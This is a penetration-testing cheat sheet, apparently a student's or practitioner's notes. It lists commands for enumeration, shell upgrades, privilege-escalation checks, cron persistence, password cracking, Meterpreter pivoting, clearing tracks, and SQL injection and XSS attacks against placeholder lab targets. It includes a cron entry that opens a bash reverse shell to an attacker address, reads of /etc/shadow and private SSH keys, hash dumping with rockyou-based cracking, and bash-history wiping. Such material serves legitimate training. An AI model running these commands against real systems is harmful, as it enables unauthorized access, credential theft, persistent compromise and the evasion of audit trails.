who
w
last
lastlog
## Network
ifconfig
ip -br -c a
ip a
cat /etc/networks
cat /etc/hostname
cat /etc/hosts
cat /etc/resolv.conf
arp -a
## Services
ps
ps aux
ps aux | grep msfconsole
ps aux | grep root
top
cat /etc/cron*
crontab -l
# Metasploit
use post/linux/gather/enum_configs
use post/linux/gather/enum_network
use post/linux/gather/enum_system
use post/linux/gather/checkvm
Transferring Files
# Python 3.7
python3 -m http.server <PORT_NUMBER>
# On Windows, try
python -m http.server <PORT>
py -3 -m http.server <PORT>
Shells
cat /etc/shells
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
/bin/bash -i
/bin/sh -i
TTY Shells
# BASH
/bin/bash -i
/bin/sh -i
SHELL=/bin/bash script -q /dev/null
# PYTHON
python --version
python -c 'import pty; pty.spawn("/bin/bash")'
## Fully Interactive TTY
# Background (CTRL+Z) the current remote shell
stty raw -echo && fg
# Reinitialize the terminal with reset
reset
# PERL
perl -h
perl -e 'exec "/bin/bash";'
## Basic mode
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
# Writable files
find / -not -type l -perm -o+w
sudo -l
Win Persistence
Linux Persistence
ls -lah ~/.ssh/
cat ~/.ssh/id_rsa
cat ~/.ssh/authorized_keys
cat ~/.ssh/known_hosts
# Cron Jobs
cat /etc/cron*
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<ATTACKER_IP>/<PORT> 0>&1'"
> cron
crontab -i cron
crontab -l
# Setup a 'nc' listener and wait for the Bash Reverse Shell
nc -nvlp <PORT>
hashdump
# JohnTheRipper
john --list=formats | grep NT
john --format=NT hashes.txt
gzip -d /usr/share/wordlists/rockyou.txt.gz
john --format=NT win_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
Linux
cat /etc/shadow
# Metasploit
use post/linux/gather/hashdump
# Hashcat
hashcat --help | grep 1800
hashcat -a 3 -m 1800 linux.hashes.txt /usr/share/wordlists/rockyou.txt
Pivoting
# Meterpreter on Target1
run autoroute -s <TARGET1_SUBNET_NETWORK>
run autoroute -p
run arp_scanner -r <TARGET1_SUBNET_NETWORK>
background
use auxiliary/scanner/portscan/tcp
set RHOSTS <TARGET2_IP>
set PORTS 1-100
run
# MeterpreterPort Forwarding
portfwd add -l <LOCAL_PORT> -p <TARGET_PORT> -r <TARGET_IP>
Clearing Tracks
clearenv
# Linux /tmp
cd /tmp
history -c
cat /dev/null > ~/.bash_history
Social Engineering
# GOPHISH - Linux Install
cd /opt/
# Get the latest version link from
https://github.com/gophish/gophish/releases/
sudo wget
https://github.com/gophish/gophish/releases/download/v0.12.1/gophish-v0.12.1-
linux-64bit.zip
sudo unzip -d gophish gophish-v0.12.1-linux-64bit.zip
sudo chmod +x gophish/gophish
# Gobuster - Install
sudo apt update && sudo apt install -y gobuster
# Dirbuster - Install
sudo apt update && sudo apt install -y dirb
# Nikto - Install
sudo apt update && sudo apt install -y nikto
# BurpSuite - Install
sudo apt update && sudo apt install -y burpsuite
# SQLMap - Install
sudo apt update && sudo apt install -y sqlmap
# XSSer - Install
sudo apt update && sudo apt install -y xsser
# WPScan - Install
sudo apt update && sudo apt install -y wpscan
# Hydra - Install
sudo apt update && sudo apt install -y hydra
# Dirbuster
dirb http://<TARGET_IP>
# CURL
curl -I <TARGET_IP>
curl -X GET <TARGET_IP>
curl -X OPTIONS <TARGET_IP> -v
curl -X POST <TARGET_IP>
curl -X POST <TARGET_IP>/login.php -d "name=john&password=password" -v
curl -X PUT <TARGET_IP>
# Gobuster
gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirb/common.txt -b
403,404
# Nikto
nikto -h http://<TARGET_IP> -o niktoscan.txt
nikto -h http://<TARGET_IP>/index.php?page=arbitrary-file-inclusion.php -
Tuning 5 -o nikto.html -Format htm
Attacks
# SQLMap
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie
"PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title
## List databases
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie
"PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title --dbs
# XSSer
xsser --url 'http://<TARGET_IP>/index.php?page=dns-lookup.php' -p
'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS'
## Authenticated XSSer
xsser --url "http://<TARGET_IP>/htmli_get.php?
firstname=XSS&lastname=hi&form=submit" --
cookie="PHPSESSID=lb3rg4q495t9sqph907sdhjgg1; security_level=0" --Fp "
<script>alert(1)</script>"